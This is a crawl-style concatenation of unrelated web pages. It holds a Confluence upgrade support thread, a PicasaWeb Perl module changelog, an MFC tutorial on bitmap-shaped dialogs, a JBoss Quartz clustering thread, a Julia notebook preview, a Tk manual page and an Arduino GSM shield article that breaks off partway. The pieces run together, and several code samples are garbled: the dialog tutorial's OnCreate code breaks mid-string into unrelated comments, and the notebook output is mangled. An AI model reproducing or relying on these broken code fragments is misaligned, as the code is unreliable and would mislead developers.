It's not the same without you Join the community to find out what other Atlassian users are discussing, debating and creating. Hello confluence team, I installed the update with the installer file. And when opening the weblink comes this error: I searched in the atlassan-confluence.log and found this: 2017-11-13 17:01:05,684 INFO [localhost-startStop-1] [confluence.upgrade.impl.DefaultUpgradeManager] beforeUpgrade Finished generating pre-upgrade recovery file. 2017-11-13 17:01:07,314 ERROR [localhost-startStop-1] [atlassian.confluence.plugin.PluginFrameworkContextListener] launchUpgrades Upgrade failed, application will not start: com.atlassian.config.ConfigurationException: Cannot update schema com.atlassian.confluence.upgrade.UpgradeException: com.atlassian.config.ConfigurationException: Cannot update schema at com.atlassian.confluence.upgrade.AbstractUpgradeManager.upgrade(AbstractUpgradeManager.java:135) at com.atlassian.confluence.plugin.PluginFrameworkContextListener.launchUpgrades(PluginFrameworkContextListener.java:119) at com.atlassian.confluence.plugin.PluginFrameworkContextListener.contextInitialized(PluginFrameworkContextListener.java:78) at org.apache.catalina.core.StandardContext.listenerStart(StandardContext.java:4853) at org.apache.catalina.core.StandardContext.startInternal(StandardContext.java:53).atlassian.config.ConfigurationException: Cannot update schema at bucket.core.persistence.hibernate.schema.SchemaHelper.validateSchemaUpdateIfNeeded(SchemaHelper.java:174) at com.atlassian.confluence.upgrade.AbstractUpgradeManager.upgrade(AbstractUpgradeManager.java:120) ... 11 more Caused by: org.hibernate.tool.schema.extract.spi.SchemaExtractionException: More than one table found in namespace (, ) : AUDIT_CHANGED_VALUE at org.hibernate.tool.schema.extract.internal.InformationExtractorJdbcDatabaseMetaDataImpl.processTableResults(InformationExtractorJdbcDatabaseMetaDataImpl.java:483) at org.hibernate.tool.schema.extract.internal.InformationExtractorJdbcDatabaseMetaDataImpl.getTable(InformationExtractorJdbcDatabaseMetaDataImpl.java:264) at org.hibernate.tool.schema.extract.internal.DatabaseInformationImpl.getTableInformation(DatabaseInformationImpl.java:111) at org.hibernate.tool.schema.internal.IndividuallySchemaMigratorImpl.performTablesMigration(IndividuallySchemaMigratorImpl.java:69) at com.atlassian.confluence.impl.hibernate.ConfluenceHibernateSchemaManagementTool$3.performTablesMigration(ConfluenceHibernateSchemaManagementTool.java:110) at org.hibernate.tool.schema.internal.AbstractSchemaMigrator.performMigration(AbstractSchemaMigrator.java:203) at org.hibernate.tool.schema.internal.AbstractSchemaMigrator.doMigration(AbstractSchemaMigrator.java:110) at org.hibernate.tool.hbm2ddl.SchemaUpdate.execute(SchemaUpdate.java:87) at org.hibernate.tool.hbm2ddl.SchemaUpdate.execute(SchemaUpdate.java:58) at bucket.core.persistence.hibernate.schema.SchemaHelper.validateSchemaUpdateIfNeeded(SchemaHelper.java:171) ... 12 more 2017-11-13 17:01:07,323 ERROR [localhost-startStop-1] [atlassian.confluence.plugin.PluginFrameworkContextListener] launchUpgrades 1 errors were encountered during upgrade: 2017-11-13 17:01:07,323 ERROR [localhost-startStop-1] [atlassian.confluence.plugin.PluginFrameworkContextListener] launchUpgrades 1: Cannot update schema Could You help me, what I should do? If you need more information, let me know. Thank You. Marcus Punzelt Hello, Could you confirm with me which database and version you are running Confluence on? Thank you! Kind Regards, Shannon Thank you, Marcus. Confluence currently only supports Oracle 12c (release 1), and this has been the case for a while now. I would recommend that you first upgrade your instance of Oracle to 12c, and then re-attempt the upgrade. Let us know if you have any questions. Kind Regards, Shannon Thanks for your reply. I will check this. It is also depends of our license of oracle. Or I migrate to sql server or postgres. Thank you. I will let you know which decision I will make. Kind Regards, Marcus Marcus, No worries! What might be happening now is that the database user has too many permissions. Have a look at Database Setup for Oracle - Create user with schema-creation privileges, especially this part: Notes: - above. I would still recommend that you upgrade Oracle to a supported version, however, to avoid future issues. Let us know if you have any questions Kind regards, Shannon Great news. Confluence works. Many thanks for your help Shannon. I had any-permissions. And I revoke these permissions. But in the future I go to a supported version. Kind regards and Thanks :-), Marcus Marcus, Glad to hear that worked for you! :) If you run into any issues when upgrading your database or migrating it please feel free to raise a new question. Take care.
https://community.atlassian.com/t5/Confluence-questions/Error-Update-from-Confluence-6-3-1-to-6-5-0-Cannot-update-schema/qaq-p/671564
CC-MAIN-2018-39
en
refinedweb
Changes for version 0.11 - 2011-05-30 - Album loading sometimes failed because certain Moose attributes were set to be required when they shouldn't have been. (HT: Riccardo Mativi) - Migrating it to use my regulate Dist::Zilla setup (mostly) - Reorganized the project layout a little bit - Cleaned up the code a bit - Added calls to make_immutable to all classes, which should spead things up slightly. - Added some more attributes to control some of the previously hardcoded bits (like Google's URL and which namespaces to map in the API). - Added the xml_text() method to the base class to give "official" access to the internals of certain elements passed back by Google, but haven't been mapped to an attribute yet.. Documentation - picasa - master command for the Picasa Web scripts - picasa-get - fetch albums and photos from Google Picasa Web - picasa-list - list albums, photos, tags, or comments from Google Picasa Web Modules - Net::Google::PicasaWeb - use Google's Picasa Web API - Net::Google::PicasaWeb::Album - represents a single Picasa Web photo album - Net::Google::PicasaWeb::Base - base class - Net::Google::PicasaWeb::Comment - represents a single Picasa Web comment - Net::Google::PicasaWeb::Feed - base class for feed entries - Net::Google::PicasaWeb::Media - hold information about a photo or video - Net::Google::PicasaWeb::MediaEntry - represents a single Picasa Web photo or video - Net::Google::PicasaWeb::MediaFeed - base class for media feed entries Provides - Net::Google::PicasaWeb::Media::Content in lib/Net/Google/PicasaWeb/Media.pm - Net::Google::PicasaWeb::Media::Thumbnail in lib/Net/Google/PicasaWeb/Media.pm - Net::Google::PicasaWeb::Tag in lib/Net/Google/PicasaWeb.pm
https://metacpan.org/release/HANENKAMP/Net-Google-PicasaWeb-0.11
CC-MAIN-2018-39
en
refinedweb
Technique to Create Dialogs from Images WEBINAR: On-Demand Building the Right Environment to Support AI, Machine Learning and Deep Learning This article describes a technique for creating dialogs with any form you want for them. In order to define the form of the dialog you only have to create a bitmap with your usual graphics programm (say Photoshop or Microsoft Paint,...). In this bitmap you have to paint the form of your dialog using as many colors as you want (it can be RGB or paletted!), but remembering to choose one color to be interpreted as the only transparent (or only opaque) color. It can be any color you want, but you have to know its RGB-components, because they will be one of the parameters to pass to the BitmapRegion() function, that makes all the hard work for you! The other arguments of this function are the bitmap handle, and a boolean argument which tells the function to consider the passed color as transparent or opaque! What this function returns is a handle to a region object "hRegion", which can, and should, be passed to the member function of CWnd: SetWindowRgn(hRegion), in order to complete the definition of the form of the dialog. Sample 1 // hBitmap is the handle to the loaded bitmap // Here, the transapatent color is black. All other colors // in the bitmap will be considered opaque hRegion=BitmapRegion(hBitmap,RGB(0,0,0)); if(hRegion) SetWindowRgn(hRegion,TRUE); // TRUE=repaint the window! Sample 2: // hBitmap is the handle to the loaded bitmap // Here, the opaque color is yellow. All other colors in // the bitmap will be considered transparent // The last argument tells the function to interpret the // passed color as opaque. If this argument is not present, // the color is the trasnparent color! hRegion=BitmapRegion(hBitmap,RGB(255,255,0),FALSE); if(hRegion) SetWindowRgn(hRegion,TRUE); // TRUE=repaint the window! This technique provides two ways of using the mentioned function. One way is to use it for defining the clipping region for the dialog, as explained in the previous code. This function should be called from the OnCreate() message handler of the dialog, where the bitmap has to be loaded (further explanation below!). With this option the background of the dialog has the plain color of all the dialogs in the system. That is, the dialog has a special boundary-form, but it has the same color and appearance as all standard dialogs. You can place the controls with the Ressource Editor and work with them exactly like you would do with a normal dialog. You only have to pay attention to the position of the controls, because they have to be placed on the opaque areas of the bitmap in order to be visible! The other way to use this technique is to get a completely owner drawn dialog. Not only the boundaries of the dialog are computed from the bitmap, but also the background image of the dialog! These option needs a bit more code to get done, but it isn't complicated and the effect is really cool (you can use this for the About... dialog of your application!) With this option the background is filled with the bitmap. The controls (if you put some on the dialog) are drawn over the bitmap, so if you want them not to appear, put them on transparent areas of the dialog, or simply put them away! In the sample project, I use this option with a dialog in which I let no control be shown (in fact there remains only an "Ok" button!) and therefor I have to be able to close the dialog in another manner. The solution is to catch the clicking of the user over a special area of the bitmap. I painted a yellow cross on the bitmap and annotated the coordinates in pixels of the bounding rectangle of the cross. When the user clicks within this area, the dialog is closed with EndDialog(). In order to get the coordinates of the pointer in comparison with those of the mentiones area, the dialog has to have no caption- or title-bar, and it has to have no border! (study the sample project for a closer explanation.) Another feature implemented in this sample project for the dialog with the bitmap painted on the background, is that the user can dragg the dialog clicking anywhere on it (except on the yellow-cross which closes the dialog!). In order to achieve this effect, You have to override the OnNCHitText() message handler of the dialog and return HTCAPTION everytime the user doesn't click on the yellow-cross. In this case you return HTCLIENT, in order to let the system send the WM_LBUTTONDOWN message to the dialog! In either case (you want your bitmap to be painted on the background or not) you have to insert the following line in the .cpp file of your dialog implementation: #include "AnyForm.h" You have to include the files AnyForm.h and Anyorm.cpp in your project, in order to get things working! Explanation 1: The bitmap is used only to compute the clipping region of the dialog This option is shown in the previous photo called "Without". In this case the code is rather simple. You have to override the OnCreate() message handler of the dialog, and insert a few lines of code, in order to obtain something like this: int CMyDlgWithout::OnCreate(LPCREATESTRUCT lpCreateStruct) { if (CDialog::OnCreate(lpCreateStruct) == -1) return -1; // In this case, we don't need to store the loaded bitmap // for later use, because we don't put it on the background. // We use it only to compute the clipping region and after // the region is set on the window, we can free the loaded // bitmap. That's the reason whiy in this case there is no // need of member varibles, memory contexts,... HBITMAP hBmp; HRGN hRegion; // The name of the bitmap to load (if not in the same // directory as the application, provide full path!) // If the bitmap is to be load from the ressources, the name // stands for the ressource-string identification char *name="BitmapWithout. // // A sample where the red color is interpreted as the // opaque color... // // hRegion=BitmapRgn(hBmp,0x00FF0000,RGB(255,0,0),FALSE); //); // After this, because in this case we don't need to store // the bitmap anymore, we can free the ressources used by // it. We also don't need here to select the bitmap on the // memory context. In fact, we don't need any memory // context!!! So: // Delete the bitmap the we loaded at the beginning if(hBmp) DeleteObject(hBmp); // And in this case, that's all folks!!! return 0; } Explanation 2: The bitmap is used to compute the clipping region of the dialog, and to be painted on the background of the dialog This option is shown in the previous photo called "With". This case is a little more complicated, but it can be better understood through the code of the sample project. At first, you have to insert a few member variables in the dialog-class that controls your dialog. The class definition would look similar to this: class CMyDlgWith : public CDialog { ... // Implementation protected: HBITMAP hBmp; HBITMAP hPrevBmp; HDC hMemDC; HRGN hRegion; BITMAP bmInfo; ... }; You have to override the message handlers for the following messages: WM_CREATE, WM_DESTROY and WM_ERASEBKGND. The code for these functions would look like this: int CMyDlgWith::OnCreate(LPCREATESTRUCT lpCreateStruct) { if (CDialog::OnCreate(lpCreateStruct) == -1) return -1; // The name of the bitmap to load (if not in the same // directory as the application, provide full path!) // If the bitmap is to be load from the ressources, // the name stands for the ressource-string identification char *name="BitmapWith); // We ask the bitmap for its size... GetObject(hBmp,sizeof(bmInfo),&bmInfo); // At last, we create a display-compatible memory context! hMemDC=CreateCompatibleDC(NULL); hPrevBmp=(HBITMAP)SelectObject(hMemDC,hBmp); return 0; } void CMyDlgWith::OnDestroy() { CDialog::OnDestroy(); // Simply select the previous bitmap on the memory context... SelectObject(hMemDC,hPrevBmp); // ... and delete the bitmap the we loaded at the beginning if(hBmp) DeleteObject(hBmp); } BOOL CMyDlgWith::OnEraseBkgnd(CDC* pDC) { // If you only want a dialog with a special border-form, // but you don't want a bitmap to be drawn on its background // surface, then comment the next two lines, and uncomment // the last line in this function! BitBlt(pDC->m_hDC, 0, 0, bmInfo.bmWidth, bmInfo.bmHeight, hMemDC, 0, 0, SRCCOPY); return FALSE; // return CDialog::OnEraseBkgnd(pDC); } The last thing to do, is to provide the dialog a way to get closed by the user. As I mentioned before, the best thing is to draw a special figure anywhere on the bitmap and to catch the clicking of the mouse in this area, by catching the WM_LBUTTONDOWN message of the dialog. Another feature can be easily implemented: permit 'click and drag' the dialog clicking anywhere on it! This can be achieved by catching the WM_NCHITTEST message. The following code shows how this is implemented: void CMyDlgWith::OnLButtonDown(UINT nFlags, CPoint point) { // If the user clicks on the 'x'-mark we close the dialog! // The coordinates of the rectangle around the 'x'-mark // are in pixels and client-coordinates! // That's the reason why the dialog ressource has to have // no border and no caption bar. if(point.x>333 && point.x<354 && point.y>54 && point.y<77) EndDialog(0); CDialog::OnLButtonDown(nFlags, point); } UINT CMyDlgWith::OnNcHitTest(CPoint point) { ScreenToClient(&point); // Because "point" is passed in screen coordinates // (Windows knows why?!) we have to convert it to client // coordinates, in order to compare it with the bounding // rectangle around the 'x'-mark. If the point lies within, // then we return a hit on a control or some other client // area (so that the OnLButtonDown-message can be sent, and // afterwards close the dialog!), but in all other cases, // we return the information as if the user always would // have clicked on the caption bar. These permitts the user // to drag and move the dialog clicking anywhere on it // expect the rectangle we considere here! if(point.x>333 && point.x<354 && point.y>54 && point.y<77) return HTCLIENT; else return HTCAPTION; } Demo project The demo project shows the two ways of using this technique. The source code has comments in order to get better explained. Source code The source code comprises only the two following files, that you have to include in your project: AnyForm.h and AnyForm.cpp. DownloadsDownload source - 4 Kb Download demo project - 115 Kb There are no comments yet. Be the first to comment!
https://www.codeguru.com/cpp/w-d/dislog/bitmapsimages/article.php/c5055/Technique-to-Create-Dialogs-from-Images.htm
CC-MAIN-2018-39
en
refinedweb
using components.xml to schedule Quartz job in clusterSystem Administrator Mar 20, 2008 5:44 PM The scheduling using EJB3 timer serive or Quartz for jobs is working fine for an interval-based timer (use case is to query AD every x seconds/minutes and cache the data in an instance variable). The question is what happens when I use the following in components.xml to schedule/create a job when the app is deployed in a clustered JBoss environment? I do not have access to a JBoss cluster but we will be deploying to a prod 2-node cluster. My concern is that the job will be created twice (or n times per n nodes in the cluster). By default, Quartz uses in-memory storage. For clustered mode, it is required to use JDBCJobStore for Quartz. EJB timer does not support clusters. Any tips would be appreciated. thx. <event type="org.jboss.seam.postInitialization"> <action execute="#{controller.scheduleTimer}"/> </event> <!-- Install the QuartzDispatcher --> <async:quartz-dispatcher/> controller POJO: @Name("controller") @AutoCreate public class ScheduleController { @In ScheduleProcessor processor; @Logger Log log; private Map<String,List<UserItem>> map; private String distinguishedNameShims; private String distinguishedNameItJava; private Timer timer; private QuartzTriggerHandle quartzTriggerHandle; //test method from button in JSF public void scheduleTimer() { ... } } application-scoped POJO: @Name("processor") @AutoCreate @Scope(ScopeType.APPLICATION) public class ScheduleProcessor { ... } 1. Re: using components.xml to schedule Quartz job in clusterMarcus Popetz Mar 21, 2008 4:19 PM (in response to System Administrator) We handle this manually in our 12 node cluster. ie: Each node has a servername passed in at startup via the -D flag and then we use that name plus name of the task to query the database to see if the job should be running on that node. It would be nice if there were a built in way to handle this, but I haven't seen one yet. Some code to illustrate in case my description wasn't clear. The SiteGlobal entity is a name/value pair we store in the db for config. SiteGlobal globalValue = SiteGlobal.retrieveByName(discussionSession, (serverName==null?"":serverName+ ".QUARTZ_ENABLED")); if(globalValue==null) { System.out.println("Quartz not approved in the SiteGlobal table to run: siteGlobal: "+serverName+ ".QUARTZ_ENABLED"); enabled = false; } else { enabled = globalValue.getValue().equalsIgnoreCase("ON"); } if (enabled) { apacheLogFollower.lookForNewData(5000L, 60000L); 2. Re: using components.xml to schedule Quartz job in clusterMarius Oancea Mar 13, 2009 11:11 AM (in response to System Administrator)I think this is not the idea of clustering. All the nodes has to have the chance to run the job. I have a similar architecture: @Observer("org.jboss.seam.postInitialization") public String callScheduler() { ... QuartzTriggerHandle handleHour = processor.scheduleCollector(new Date(), "0 0/30 * * * ?"); } and: @Asynchronous @Transactional public QuartzTriggerHandle scheduleCollector (@Expiration Date when, @IntervalCron String cron) { // do something at the scheduled time } My seam.quartz.property is: #============================================================================ # Configure Main Scheduler Properties #============================================================================ org.quartz.scheduler.instanceName = DefaultQuartzScheduler org.quartz.scheduler.instanceId = AUTO org.quartz.scheduler.rmi.export = false org.quartz.scheduler.rmi.proxy = false org.quartz.scheduler.wrapJobExecutionInUserTransaction = false #============================================================================ # Configure ThreadPool #============================================================================ org.quartz.threadPool.class = org.quartz.simpl.SimpleThreadPool org.quartz.threadPool.threadCount = 10 org.quartz.threadPool.threadPriority = 5 org.quartz.threadPool.threadsInheritContextClassLoaderOfInitializingThread = true #============================================================================ # Configure JobStore #============================================================================ org.quartz.jobStore.misfireThreshold = 60000 org.quartz.jobStore.isClustered = true org.quartz.jobStore.clusterCheckinInterval = 15000 org.quartz.jobStore.class = org.quartz.impl.jdbcjobstore.JobStoreTX org.quartz.jobStore.driverDelegateClass = org.quartz.impl.jdbcjobstore.DB2v8Delegate org.quartz.jobStore.dataSource = QUARTZ org.quartz.jobStore.nonManagedTXDataSource = QUARTZ_NO_TX org.quartz.jobStore.tablePrefix = QRTZ_ org.quartz.jobStore.selectWithLockSQL=SELECT * FROM {0}LOCKS UPDLOCK WHERE LOCK_NAME = ? FOR UPDATE org.quartz.dataSource.QUARTZ.jndiURL = java:/emailcollectorDatasource org.quartz.dataSource.QUARTZ_NO_TX.jndiURL = java:/emailcollectorDatasource There is no classpath problem on seam2.1.1 but the jobs are executed on all the nodes of the cluster. Any idea why? 3. Re: using components.xml to schedule Quartz job in clusterNikolay Elenkov Mar 13, 2009 12:38 PM (in response to System Administrator) Marius Oancea wrote on Mar 13, 2009 11:11: @Observer("org.jboss.seam.postInitialization") public String callScheduler() { ... QuartzTriggerHandle handleHour = processor.scheduleCollector(new Date(), "0 0/30 * * * ?"); } There is no classpath problem on seam2.1.1 but the jobs are executed on all the nodes of the cluster. Any idea why? 'postInitialization' is raised for each app instance (at each node), so your job is probably scheduled multiple times. You will have to add some code to check if the job is already scheduled and skip scheduleCollector() if it is. You will have to use the Quartz API for that (Scheduler, Trigger and friends). Btw, I recommend using the Quartz API directly for scheduling as well, especially since you are running in a cluster. QuartzTriggerHandle is practically useless: there is no way to get the job/trigger name, you get automatically generated names (UIDs) that make debugging/support quite hard, etc. In short, the native Quartz API is way more flexible. Seam Quartz wrappers work well for one shot jobs (async methods and stuff) but for anything more than that you are better off with native Quartz.
https://developer.jboss.org/message/665262?tstart=0
CC-MAIN-2018-39
en
refinedweb
[SOLVED] stdlib: No such file or directory Hello, I new with Qt I'm trying to build android documentation example "Creating a Mobile Application" , but stdlib: No such file or directory #include <stdlib.h>^ /home/myuser/android-ndk/sources/cxx-stl/gnu-libstdc++/4.9/include/cstdlib I'm using: - Debian 64bits - SDK - NDK 64 bits - Qt Creator 3.2.1 Thanks in avanced! - sierdzio Moderators Use this instead: @ #include <cstdlib> @ Thanks! But I had been try your suggestion... After search and researching on the web I found I solution in this post: "":
https://forum.qt.io/topic/46691/solved-stdlib-no-such-file-or-directory
CC-MAIN-2018-39
en
refinedweb
The Event class contains all Particles produced in the generation of an event. More... #include <Event.h> The Event class contains all Particles produced in the generation of an event. The particles are divided into Collisions corresponding to the actiual collisions between incoming particles in a bunch crossing. Event inherits from the Named which holds the name of an event. Definition at line 36 of file Event.h. Map colour lines to indices. Definition at line 48 of file Event.h. tcEventBasePtr() "" -1 1.0 The standard constructor for an Event takes as arguments a pair of colliding particles (corresponding to the primary collision in case of multiple collisions in an event). Optionally a pointer to the EventHandler which performed the generation, an event name and event number can be given. Add a new Step to this Collision. For book keeping purposes only. The steps are accessed from the different Collisions in this Event. Definition at line 298 of file Event.h. References allSteps, Init(), persistentInput(), persistentOutput(), rebind(), and removeEntry(). Add a new SubProcess to this Event. For book keeping purposes only. The sub-processes are accessed from the different Collisions in this Event. Definition at line 284 of file Event.h. References allSubProcesses. Returns a full clone of this Event. All collisions, Particles etc. in this Event are cloned. Particle Print out debugging information for this object on std::cerr. To be called from within a debugger via the debug() function. Reimplemented from ThePEG::Base. Extract all final state particles in this Event. Definition at line 121 of file Event.h. References ThePEG::inserter(), and selectFinalState(). Definition at line 129 of file Event.h. References selectFinalState(). Return a pointer to the EventHandler which produced this Event. May be the null pointer. Definition at line 90 of file Event.h. References select(), and theHandler. Standard Init function. Referenced by addStep(). Create a new Step in the current Collision, which is a copy of the last Step (if any) and return a pointer to it. If no collision exists, one will be added. Referenced by incoming(). Return the number assigned to this Event. The name is accessed with the name() method of the Named base class. Definition at line 183 of file Event.h. References cleanSteps(), colourLineIndex(), removeDecay(), removeParticle(), and theNumber. Return an optional named weight associated to this event. Returns 0, if no weight identified by this name is present. Referenced by weight(). Return a pointer to the primary Collision in this Event. Definition at line 139 of file Event.h. References collisions(). Referenced by optionalWeights(), primarySubProcess(), and select(). Return a pointer to the primary SubProcess in the prinmary Collision in this Event. Definition at line 457 of file Event.h. References collisions(), and primaryCollision(). Referenced by collisions(). Rebind to cloned objects. When an Event is cloned, a shallow copy is done first, then all Particles etc, are cloned, and finally this method is used to see to that the pointers in the cloned Event points to the cloned Particles etc. Remove the given Particle from the Collision. If this was the last daughter of the mother Particle, the latter is added to the list of final state particles. Referenced by number(). Extract particles from this event which satisfies the requirements given by an object of the SelectorBase class. Definition at line 464 of file Event.h. References ThePEG::SelectorBase::allCollisions(), primaryCollision(), and theCollisions. Referenced by handler(), and selectFinalState(). Definition at line 111 of file Event.h. References select(). Referenced by getFinalState(). Most of the Event classes are friends with each other. Definition at line 45 of file Event.h.
https://thepeg.hepforge.org/doxygen/classThePEG_1_1Event.html
CC-MAIN-2018-39
en
refinedweb
: 1 + sin(3) 1.1411200080598671 500x500 Float64 Array: 162.603 127.476 125.076 118.914 … 121.913 119.346 123.416 118.659 127.476 173.211 132.191 125.419 131.765 126.816 131.182 126.373 125.076 132.191 165.643 122.073 123.358 119.285 127.365 127.132 118.914 125.419 122.073 161.962 124.197 116.947 125.176 119.248 119.912 127.888 125.779 119.243 124.572 120.879 124.785 123.494 113.774 118.241 121.404 118.418 … 121.256 118.652 120.242 117.505 125.258 128.183 125.683 123.607 122.044 120.701 127.675 123.064 123.856 128.797 127.62 126.731 125.854 121.413 130.059 129.455 119.448 123.88 122.982 117.524 119.345 119.598 121.751 120.35 121.084 132.255 125.685 126.087 125.765 122.052 134.187 124.131 ⋮ ⋱ 122.913 126.649 124.402 122.839 … 128.841 119.598 131.985 119.851 119.279 120.223 119.79 118.196 121.333 116.689 121.644 117.713 115.047 121.647 119.567 119.708 120.483 116.044 124.468 116.12 118.465 127.593 120.366 116.033 116.425 115.412 123.313 120.278 121.567 127.576 123.69 118.96 119.438 116.865 125.093 116.793 122.765 127.004 123.946 119.973 … 122.286 121.177 126.788 124.31 121.913 131.765 123.358 124.197 168.014 122.242 128.991 122.263 119.346 126.816 119.285 116.947 122.242 161.424 123.398 119.624 123.416 131.182 127.365 125.176 128.991 123.398 173.575 128.892 118.659 126.373 127.132 119.248 122.263 119.624 128.892 161.5"); We can define functions, of course, and use them in later input cells: f(x) = x + 1 # methods for generic function f f(x) at In[6]:1 println(f(3)) f([1,1,2,3,5,8]) Hello from C!! 4 6-element Int64 Array:?") no method +(ASCIIString,Int64) at In[8]:1 in f at In[6]") PyObject <matplotlib.text.Text object at 0x1190c7b50> Notice that, by default, the plots are displayed inline (just as for the %pylab inline "magic" in IPython). This kind of multimedia display can be enabled for any Julia object, as explained in the next section. Like most programming languages, Julia has a built-in print(x) function for outputting an object x as text, and you can override the resulting text representation of a user-defined type by overloading Julia's show function. The next version of Julia, however, will extend this to a more general mechanism to display arbitrary multimedia representations of objects, as defined by standard MIME types. More specifically, the Julia multimedia I/O API provides: display(x)function requests the richest available multimedia display of a Julia object x (with a text/plainfallback). writemimeallows one to indicate arbitrary multimedia representations (keyed by standard MIME types) of user-defined types. Displaytype. IJulia provides one such backend which, thanks to the IPython notebook, is capable of displaying HTML, LaTeX, SVG, PNG, and JPEG media formats. The last two points are critical, because they separate multimedia export (which is defined by functions associated with the originating Julia data) from multimedia display (defined by backends which know nothing about the source of the data). Precisely these mechanism were used to create the inline PyPlot plots above. To start with, the simplest thing is to provide the MIME type of the data when you call display, which allows you to pass "raw" data in the corresponding format: display("text/html", """Hello <b>world</b> in <font color="red">HTML</font>!""") However, it will be more common to attach this information to types, so that they display correctly automatically. For example, let's define a simple HTML type in Julia that contains a string and automatically displays as HTML (given an HTML-capable backend such as IJulia): type HTML s::String end import Base.writemime writemime(io::IO, ::@MIME("text/html"), x::HTML) = print(io, x.s) # methods for generic function writemime writemime(io,::MIME{:text/plain},x) at multimedia.jl:31 writemime(io,m::String,x) at multimedia.jl:37 writemime(io::IO,m::MIME{:image/eps},f::PyPlotFigure) at /Users/stevenj/.julia/PyPlot/src/PyPlot.jl:67 writemime(io::IO,m::MIME{:application/pdf},f::PyPlotFigure) at /Users/stevenj/.julia/PyPlot/src/PyPlot.jl:67 writemime(io::IO,m::MIME{:image/png},f::PyPlotFigure) at /Users/stevenj/.julia/PyPlot/src/PyPlot.jl:67 ... 4 methods not shown (use methods(writemime) to see them all) Here, writemime is just a function that writes x in the corresponding format ( text/html) to the I/O stream io. The @MIME is a bit of magic to allow Julia's multiple dispatch to automatically select the correct writemime function for a given MIME type (here "text/html") and object type (here HTML). We also needed an import statement in order to add new methods to an existing function from another module. This writemime definition is all that we need to make any object of type HTML display automatically as HTML text in IJulia: x = HTML("<ul> <li> Hello from a bulleted list! </ul>") display(x) println(x) HTML("<ul> <li> Hello from a bulleted list! </ul>") Once this functionality becomes available in a Julia release, we expect that many Julia modules will provide rich representations of their objects for display in IJulia, and moreover that other backends will appear. Not only can other backends (such as Tim Holy's ImageView package) provide more full-featured display of images etcetera than IJulia's inline graphics, but they can also add support for displaying MIME types not handled by the IPython notebook (such as video or audio).
http://nbviewer.jupyter.org/url/jdj.mit.edu/~stevenj/IJulia%20Preview.ipynb
CC-MAIN-2018-39
en
refinedweb
Tk_GetUid, Tk_Uid - convert from string to unique identifier #include <tk.h> #typedef char *Tk_Uid Tk_Uid Tk_GetUid(string) String for which the corresponding unique identifier is desired. Tk_GetUid returns the unique identifier corresponding to string. Unique identifiers are similar to atoms in Lisp, and are used in Tk to speed up comparisons and searches. A unique identifier (type Tk_Uid) is a string pointer and may be used anywhere that a variable of type ``char *'' could be used. However, there is guaranteed to be exactly one unique identifier for any given string value. If Tk_GetUid is called twice, once with string a and once with string b, and if a and b have the same string value (strcmp(a, b) == 0), then Tk_GetUid will return exactly the same Tk_Uid value for each call (Tk_GetUid(a) == Tk_GetUid(b)). This means that variables of type Tk_Uid may be compared directly (x == y) without having to call strcmp. In addition, the return value from Tk_GetUid will have the same string value as its argument (strcmp(Tk_GetUid(a), a) == 0). atom, unique identifier
http://search.cpan.org/dist/Tk/pod/pTk/GetUid.pod
CC-MAIN-2016-30
en
refinedweb
- shield) has several new hardware features, that allow maximum customization and provide many configurations. We begin with the supply circuit a simple LM7805. To work, it is necessary to provide an input voltage between 7.5V and 12V. As shown in the circuit diagram, the input voltage, after being stabilized at 5 V, is reduced to 4.3 V by using a diode and provide power to modules that need a voltage between the 3.2 and 4.8 V. During the operations such as the use of GPRS, the module absorbs a current of about 1 A, therefore it is necessary that the power source is able to provide this current intensity. An important technical feature is the serial adapter for the communication between the GSM module and Arduino. To reduce the tension has been used a simple voltage divider, while for raising the voltage from the GSM module to Arduino we chose a MOSFET BS170. The news that is immediately evident is the presence of two jacks for audio. With a microphone and a headset with a 3.5 mm jack (just the standard headphones for computers), you can make a voice call !! To preserve compatibility with the Arduino Mega, we changed the selection method for the serial communication. The two different serial communication modes (hardware or software) are selectable by jumper, leaving the user the choice between the two configurations ( for serial software in this new version we adopted pins 2 and 3) or possibly use the pin to your choice with a simple wire connection. With this solution you can use the Arduino Mega using two of the four serial that it has, or possibly carry out the communication through a serial software via two pins of your choice. Always to preserve maximum flexibility and customization, there are some pins on the back of PCB, which allow to make the connections from the Arduino digital ports and the control signals data flow (CTS, RTS) or alerts for incoming calls or unread SMS (RI). In this new version, you can then disable these connections to save inputs or outputs pins. Comparing the new card with the previous one, you can see the presence of two connectors on the top.These additional connections allow the use of the shield also with the new small breakout for SIM900 and SIM908. The new module Simcom SIM908, is characterized by the presence of a GPS with 42 channels. The scenery offered by this new module SIMCOM, in addition to GSM GPRS shield, it is quite remarkable: the creation of a GPS tracking device that can communicate the location via the Internet (or SMS) is now available to everyone, avoiding all the problems due to assembly and low-level programming. A further feature of this new version, concerns the presence of a supercap for circuit dedicated to the RTC (Real Time Clock). Inside the SIM900, as well as the SIM908, there is a circuit that is responsible for updating the clock even without power. GSM GPS SHIELD SCHEMATICS [CODE] R1: 10 kohm R2: 10 kohm R3: 10 kohm R4: 10 kohm C1: 100 nF C2: 470 µF 25 VL C3: 100 nF C4: 220 µF 16 VL C5: 47 pF C6: 47 pF C7: 47 pF C8: 47 pF C9: 47 pF C10: 47 pF C11: 220 µF 16 VL C12: 100 nF CRCT: 0,1F U1: 7805 T1: BS170 D1: 1N4007 P1: Microswitch MIC: jack 3,5 mm SPK: jack 3,5 mm [/CODE] SOFTWARE INNOVATIONS The software library related to the GSM GPRS shield has been updated. The library is open-source and uses the hosting service Google Project, located at . The library is constantly updated and improved with the addition of new features, so please check that you always have the latest release. The main enhancement is the TPC/IP communication support through GPRS. With a simple function, you can connect Arduino to internet using the APN (Access Point Name) you choose. After that we will automatically get an IP address by the provider. To establish communication you must define which device performs the function of the server (still waiting for some connection), such as that client (requires a connection to the server according to the information you want to achieve) and that leads to exchange data . In the library there are two functions that allow us to set the device to listen on a particular port for connections (server), or to establish a connection based on the server address and port chosen (client) . Once connected, you can send the data, which can be command strings or just the data you want to monitor, for this action there is a high-level function, which simplifies the management. LIBRARY FUNCTIONS GSM GPRS First, you must have the folder libraries, in the root directory of the Arduino, the folder GSM_GPRS containing all the functions you can use. Now if you want to change the serial port, through the jumper, you have to modify the file GSM.cpp. To save memory, we decided to divide the functions into different classes contained in different files, to allow you to include or not the code parts needed, thus going to save memory RAM, leaving it free for the rest of the program. For the basic operation is always necessary to include files SIM900.h and SoftwareSerial.h, while depending on the needs you may include call.h (for call handling), sms.h (for sending, receiving and saving SMS) and inetGSM.h (containing functions related to HTTP, and GPRS). SIM900.h You should always include this file. It contains the basic functions for starting and configuring the GSM module. Simply call the functions using “GSM.” As a prefix. call.h In case you want to make a call, or simply refuse to answer an incoming call, you must use this class. 